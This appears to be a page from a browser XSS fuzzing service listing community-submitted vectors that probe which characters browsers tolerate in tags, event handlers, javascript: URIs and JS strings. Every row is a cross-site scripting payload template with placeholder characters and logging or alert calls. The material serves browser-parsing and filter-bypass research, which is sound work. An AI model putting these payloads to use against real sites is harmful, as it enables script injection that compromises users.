Featured vector

Firefox 0.0
<script src=data:0x2calert(1)></script>

5,456,811 Successful fuzzes

Fuzz Vectors

Searching for "char"

All vectors

| Description | Vector | Created by |
| --- | --- | --- |
| Possibility of XSS via lead bytes | `<html> <head> <title>Possibility of XSS via lead bytes... @irsdl</title> <!-- <meta charset="utf-8"> or <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> Ref: https://code.google.com/p/doctype-mirror/wiki/MetaCharsetAttribute --> </head> <body> <p><input size=20 value="*chr*"></p> <p><input size=20 value="<script>logChr(*num*)</script>"></p> <!-- References: http://powerofcommunity.net/poc2008/hasegawa.pptx http://websecurity.com.ua/2928/ https://bugzilla.mozilla.org/show_bug.cgi?id=690225 --> </body> </html>` | @irsdl |
| replacement | `*chr*img src=xx:xx onerror=logChr(*num*)>` | @matttiko |
| char after lt and before still valid html | `<*chr*,script>logChr(*num*);</script>` | @p_laguna |
| Separators | `<svg*chr*onload=logChr(*num*)>` | @JohnathanKuskos |
| character between two URI | `<a href="http://*chr*javascript:alert(1)">testxss</a>` | @Mramydnei |
| Characters allowed before script tag name | `<*chr*script> logChr(*num*) </script>` | @tifkin_ |
| allowed char in js comment | `<script>logChr(*num*)<*chr*!-- '</script>` | @insertScript |
| img onload with only one char in src | `<img src=*chr* onload=logChr(*num*)>` | @insertScript |
| char after lt still valid html | `<*chr*a href=x onerror=logChr(*num*)>` | @ethicalhack3r |
| lt eating char log | `<img src=x *chr*> onerror="console.log(document.getElementsByTagName('html')[0].innerHTML)">` | @insertScript |
| lt eating char v2 | `<img src=x *chr*> onerror=logChr(*num*)>` | @insertScript |
| lt eating char | `<img src=x *chr*> onerror=logChr(*num*)>` | @insertScript |
| chars allowed after colon v2 | `htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){};` | @heyheyheyhey10 |
| chars allowed in colon v2 | `htmlStr = '<a href="javascript&col'+*chr*+'on;123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*num*); } }catch(e){};` | @heyheyheyhey10 |
| chars allowed after colon | `htmlStr = '<a href="javascript&colon'+*chr*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { logChr(*chr*); } }catch(e){};` | @heyheyheyhey10 |
| Replacement for s in script tag | `<*chr*cript>logChr(*num*)</script>` | @blubbfiction |
| char for firing onload event | `<img src=*chr* onload=logChr(*num*)>` | @heyheyheyhey10 |
| Char that allows you to act as a slash in closing tag 2 | `<script>log(*num*)<*chr*script></script>` | @notxssninja |
| Char after lt | `<*chr*script>alert(*num*)</script>` | @ethicalhack3r |
| Characters consuming backslashes and breaking JS strings | `<script>a='abc\*chr*\';log(*num*)//def';</script>` | @0x6D6172696F |